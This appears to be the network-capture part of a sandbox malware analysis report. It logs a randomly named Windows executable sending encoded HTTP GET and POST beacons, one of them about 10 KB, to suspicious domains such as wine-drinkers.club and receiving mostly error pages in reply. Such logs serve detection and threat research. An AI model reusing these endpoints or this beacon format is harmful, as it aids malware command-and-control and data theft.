                                                Data Ascii: AFF=1L2P5XVtv5AyEZ/nt6CTg3DIm3ZGCNtsEsxuyLi9H4IplvnAjRiSQI/iVBuw0wqSpGla+S9S9lwPC6Ld974XImRf8hjy/llmIiWO+jV/Kio0G9gvHK4lhdn6iLmoZlDZGOtr3FbyDOK1DP7Llx55GSuQrhOnxcqVhOp/IBtRE8PX1OVUNZoee4hVnhrW3iL1q272hDMH53CLdS2Vc7nkbX0uEy5VRRfH+TSS1L5miB6lMJ8+y54F+NF2sEmVzB+eJrdhf8bctHh5cnfUY+qz1Nk79Ii7GmBBUdIUtKBQXw5Ru9q2e9RfMLla4YHi5R+Lij+3fAZz/khmxiHze/Z76+lJnuOTpT3zMX17K6hrzqNaKdH27I8Tgm7zkVEvnNBgHV4Pf3MkTHmf/1QD/4IAf4or6CGqWmvxiGOvvYbK3g6jzAkjV69wplf/K3DPR3916nT+sSAVT8M5s5H7e0tVcclZj6SdPU46W7Xy39ODiDa4eU/OBpTDUKdAKIecHwYVWuv8I/NwFU6TPq/zAOKrwU0JFwhq0/0tGeS0NFDP7itrEcpAS2XdrvO2pSa/I8ncxt8QYtcSA/UES9dKvhTeb+yUMxZTNs3drz9m/nhACshdAwF9jWpfkAhvf1PIOBMkWb+mwOW8vUR9EGr/Tbv7kIVjk/hykXNp1IImoqBajTJ4+2HYFEm3RczUNWd/GxAGMZ8dAwQtbwUBHN9/w5aHVLx6ckfdSPsINdfRv/9Ntd8ftKc9aUYmgvg4O1ivzMWS9nzJAQ1swAsq2yHMHsCvndAeyVegdrCJD+xmSJCXGvk/NGSylXY2gE2EbhKUymWowRTpi0ut1+3feiYbhQ3GtBCtPB3EhfNADXwefeWZYeHPBLwqVYFRgJ66pw4Q+7om09hveqGA9/BrUr9d6Ou9PrlLGafhI0LWf90Lu7PcSiPhTPII/z+IC4JZ6kzX2DrdsVhBSOzdWuMYSxBXfnS2qyo4SIxdDquqGzeb7H8nbF+AMMVj [TRUNCATED]
                                                Nov 22, 2024 12:42:52.183542967 CET764INHTTP/1.1 405 Not Allowed
                                                Date: Fri, 22 Nov 2024 11:42:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Me4pb2HezoWbUuf5uR7AL0Y0Y3fVbxuxDkpGZJSv7REmHJ2fDkPqggloMGmfu2XrgihYSV1OrGT%2BtB7f%2BAezCCA%2Frx5noS2DoKVsj8dgAzn7LhI9BNxV9nu4td24ivgA7jbJmkv%2F2DfMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a8959e1c4327-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10830&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Nov 22, 2024 12:42:52.184073925 CET571INData Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20
                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.449866172.67.220.36804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:53.569525003 CET454OUTGET /rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw= HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Nov 22, 2024 12:42:54.964524984 CET1236INHTTP/1.1 200 OK
                                                Date: Fri, 22 Nov 2024 11:42:54 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                Accept-Ranges: bytes
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcUZDAuwOX2D3Expn4lBL2y49LwHK84hn%2FwIxbTug98WWIUqyGyIhRM1udAXvNHyMpVnhzjcHuzC%2F24E4KVYFuqZYfYq71NuGQUbFtnS1JGyJ0Gz0RNL94k2vD%2FV4e9zHCmBpKvQa%2FozaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a8a6fb9a43da-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1612&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=454&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-blo
                                                Nov 22, 2024 12:42:54.964586020 CET1236INData Raw: 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72
                                                Data Ascii: ck}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Ro
                                                Nov 22, 2024 12:42:54.964608908 CET1236INData Raw: 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77 6f 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74
                                                Data Ascii: ute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-height:1.2777777778}.windo
                                                Nov 22, 2024 12:42:54.964627981 CET1236INData Raw: 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e
                                                Data Ascii: indow-main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{p
                                                Nov 22, 2024 12:42:54.964639902 CET1236INData Raw: 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b
                                                Data Ascii: 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100v
                                                Nov 22, 2024 12:42:54.964651108 CET1236INData Raw: 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33
                                                Data Ascii: rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170
                                                Nov 22, 2024 12:42:54.964663982 CET1236INData Raw: 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64
                                                Data Ascii: s not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F14;}a:hover{border: 2
                                                Nov 22, 2024 12:42:54.964772940 CET1236INData Raw: 31 32 43 33 39 36 2e 33 39 32 20 32 33 38 2e 38 35 39 20 34 30 34 2e 37 32 38 20 32 39 38 2e 32 35 36 20 33 37 38 2e 30 36 37 20 33 35 33 2e 37 38 36 43 33 35 31 2e 34 30 35 20 34 30 39 2e 33 31 37 20 32 39 39 2e 38 34 31 20 34 33 39 2e 39 35 33
                                                Data Ascii: 12C396.392 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="629.662" height="810.506" filt
                                                Nov 22, 2024 12:42:54.964817047 CET1236INData Raw: 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73
                                                Data Ascii: al" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="90" result="effect1_foregroundBlur_2001_5" /></filter></defs></svg><h1 class="window-main__title">Why am I seei
                                                Nov 22, 2024 12:42:54.964829922 CET1236INData Raw: 22 20 63 79 3d 22 31 33 34 2e 32 39 39 22 20 72 78 3d 22 31 31 32 2e 35 33 34 22 20 72 79 3d 22 31 33 34 2e 32 39 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 2d 30 2e 39 31 36 33 36 36 20 30 2e 34 30 30 33 34 31 20 2d 30 2e 31
                                                Data Ascii: " cy="134.299" rx="112.534" ry="134.299" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 379.183 586.577)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter1_f_2001_10)"><path d="M259.743 638.552C361.981 4
                                                Nov 22, 2024 12:42:54.976654053 CET167INData Raw: 44 65 76 69 61 74 69 6f 6e 3d 22 39 30 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 31 30 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 3c
                                                Data Ascii: Deviation="90" result="effect1_foregroundBlur_2001_10" /></filter></defs></svg></div></section></main></div></body></html>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.449882194.245.148.189804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:43:00.595241070 CET725OUTPOST /hakt/ HTTP/1.1
                                                Host: www.wine-drinkers.club
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 200
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.wine-drinkers.club
                                                Referer: http://www.wine-drinkers.club/hakt/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 58 51 65 43 6a 4c 75 6c 52 78 51 54 4c 74 67 6d 35 64 52 52 46 6c 5a 2b 33 47 4e 68 69 2b 44 57 67 61 47 55 45 38 6f 66 42 6c 45 79 78 33 75 37 77 4e 67 32 6d 62 6e 38 6e 37 5a 34 78 4c 4c 36 50 49 6e 30 51 6a 48 65 44 2f 70 66 4c 34 79 30 54 2f 67 77 74 79 4c 69 36 7a 5a 69 63 43 6f 4b 45 7a 67 46 57 6c 4e 6f 75 68 36 4d 6b 69 66 79 66 74 57 75 34 32 47 57 6d 61 41 68 52 6a 7a 37 55 6a 38 66 2f 68 62 38 58 51 54 57 46 79 52 48 31 4a 58 58 43 74 54 54 5a 5a 41 57 4d 35 66 74 66 7a 76 61 6f 75 61 75 47 57 6d 49 2f 75 69 7a 55 4b 4e 55 41 41 3d 3d
                                                Data Ascii: AFF=U185+ex9Ij9AXQeCjLulRxQTLtgm5dRRFlZ+3GNhi+DWgaGUE8ofBlEyx3u7wNg2mbn8n7Z4xLL6PIn0QjHeD/pfL4y0T/gwtyLi6zZicCoKEzgFWlNouh6MkifyftWu42GWmaAhRjz7Uj8f/hb8XQTWFyRH1JXXCtTTZZAWM5ftfzvaouauGWmI/uizUKNUAA==
                                                Nov 22, 2024 12:43:01.931945086 CET725INHTTP/1.1 403 Forbidden
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:43:01 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.449888194.245.148.189804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:43:03.552467108 CET745OUTPOST /hakt/ HTTP/1.1
                                                Host: www.wine-drinkers.club
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 220
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.wine-drinkers.club
                                                Referer: http://www.wine-drinkers.club/hakt/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 57 77 75 43 76 4d 43 6c 58 52 51 51 46 4e 67 6d 69 4e 52 4e 46 6c 46 2b 33 48 5a 50 6a 4d 58 57 68 2f 36 55 46 39 6f 66 45 6c 45 79 37 58 75 36 36 74 67 35 6d 61 62 65 6e 36 6c 34 78 4c 50 36 50 4d 6a 30 51 51 2b 73 43 76 70 5a 44 59 79 32 51 50 67 77 74 79 4c 69 36 31 31 62 63 43 67 4b 46 44 77 46 55 41 68 72 74 68 36 4c 6a 69 66 79 56 39 57 71 34 32 48 37 6d 65 59 4c 52 67 4c 37 55 68 30 66 78 55 6e 7a 65 51 54 51 4c 53 51 34 39 5a 4f 53 61 64 65 75 64 62 73 73 4c 64 4c 37 65 31 69 41 35 66 37 35 55 57 43 37 69 70 72 48 5a 4a 77 64 62 4e 65 67 30 75 73 58 72 44 6a 61 72 76 6f 4e 43 4b 79 58 53 77 51 3d
                                                Data Ascii: AFF=U185+ex9Ij9AWwuCvMClXRQQFNgmiNRNFlF+3HZPjMXWh/6UF9ofElEy7Xu66tg5maben6l4xLP6PMj0QQ+sCvpZDYy2QPgwtyLi611bcCgKFDwFUAhrth6LjifyV9Wq42H7meYLRgL7Uh0fxUnzeQTQLSQ49ZOSadeudbssLdL7e1iA5f75UWC7iprHZJwdbNeg0usXrDjarvoNCKyXSwQ=
                                                Nov 22, 2024 12:43:04.796037912 CET725INHTTP/1.1 403 Forbidden
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:43:04 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.449899194.245.148.18980
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:43:06.668729067 CET10827OUTPOST /hakt/ HTTP/1.1
                                                Host: www.wine-drinkers.club
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 10300
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.wine-drinkers.club
                                                Referer: http://www.wine-drinkers.club/hakt/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 57 77 75 43 76 4d 43 6c 58 52 51 51 46 4e 67 6d 69 4e 52 4e 46 6c 46 2b 33 48 5a 50 6a 4e 76 57 67 4e 43 55 44 65 41 66 48 6c 45 79 33 33 75 33 36 74 67 6b 6d 62 7a 61 6e 36 6f 44 78 4a 6e 36 4e 76 72 30 48 52 2b 73 4d 66 70 5a 50 34 79 37 54 2f 68 30 74 79 62 6d 36 7a 56 62 63 43 67 4b 46 46 30 46 51 56 4e 72 68 42 36 4d 6b 69 66 2b 66 74 57 53 34 77 75 4f 6d 65 55 78 51 52 72 37 55 43 63 66 7a 6d 50 7a 52 51 54 53 62 43 51 67 39 5a 79 5a 61 64 53 31 64 66 73 47 4c 61 6a 37 64 69 4c 33 72 64 2b 67 46 51 4f 31 78 37 76 46 65 72 64 63 59 4d 66 64 79 2f 73 54 78 6e 58 45 6d 76 42 6f 64 49 69 72 4c 31 4b 72 68 76 4b 65 38 2b 55 47 49 75 36 34 4f 4b 44 38 34 4a 65 39 6d 32 76 4a 56 38 59 78 48 48 6b 66 54 48 4f 6d 6e 54 2b 71 7a 46 2f 44 55 36 71 67 34 6c 6d 69 6e 44 6f 6f 4e 36 56 48 31 42 59 77 52 32 51 67 48 6d 56 4e 4c 63 77 46 64 43 4c 52 4b 55 51 6d 49 61 78 2b 77 61 42 53 6c 6f 6e 77 38 4d 34 49 66 64 4b 54 45 57 30 33 6d 75 52 35 45 6a 30 4c 61 47 [TRUNCATED]
                                                Data Ascii: AFF=U185+ex9Ij9AWwuCvMClXRQQFNgmiNRNFlF+3HZPjNvWgNCUDeAfHlEy33u36tgkmbzan6oDxJn6Nvr0HR+sMfpZP4y7T/h0tybm6zVbcCgKFF0FQVNrhB6Mkif+ftWS4wuOmeUxQRr7UCcfzmPzRQTSbCQg9ZyZadS1dfsGLaj7diL3rd+gFQO1x7vFerdcYMfdy/sTxnXEmvBodIirL1KrhvKe8+UGIu64OKD84Je9m2vJV8YxHHkfTHOmnT+qzF/DU6qg4lminDooN6VH1BYwR2QgHmVNLcwFdCLRKUQmIax+waBSlonw8M4IfdKTEW03muR5Ej0LaGGSBp6ZUsnE535D94gC6Gc1VIT4aFBp/uJwJv1yzLlVvIp7uQTQTbVzV1qBP9WldnQgpBs1fre7M1oTjweK+JdDH1XUDm4CgzSrw4zGouOpwmV6FHIX8HHOpxRknmHXC/sOE+smdDY7uhRXqhXBjdcz5i9c79tyYOmxtxW4nccCx9tEX9tUq9iEf3wBvK6blsBy80Rlg8vIwtRY9iE+GV1LQxAmCdZQBav0q4UX+52sPeViQc9ckBUV4RShksZgeyBh0vc66HUJ0sMEBqCUKNl2lKUdFst4qezfsTYhAg8PovD/u+IDMbJcii4wYEIWx+6zE+6VR0K7kKtbqJE2lD1ynHeB5jqzlK183z7X1YX9Pwluh9HKoGXChS9DxfsnsM15BtroxHJ+aHqy2C0xZFal4kbdqgxhlrD3pJ68a3pMBdLSK2EGQGHVkE+lmw/vAshXyNt6vOwhDJ+8tKAVoQBucc1weguWUqDLW+RKJe2IWe8hz2xpRYfLJ9r8EJnIFFMx3j/M4HGODYVYI/l3m0fP0N7bzf3pp1YBxIuo8otY23ZFx+yW7LRGqH3iQpCHaKIRq+2++UN8kgX80R/DDoeIRCn7PmDt2EmMl5wxhMxAEcg+uYaf191mQXa/wisabi+7r4tWPBSf1kXHIRSZuQygVgL/aS+NFE6S [TRUNCATED]
                                                Nov 22, 2024 12:43:08.086833000 CET725INHTTP/1.1 403 Forbidden
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:43:07 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
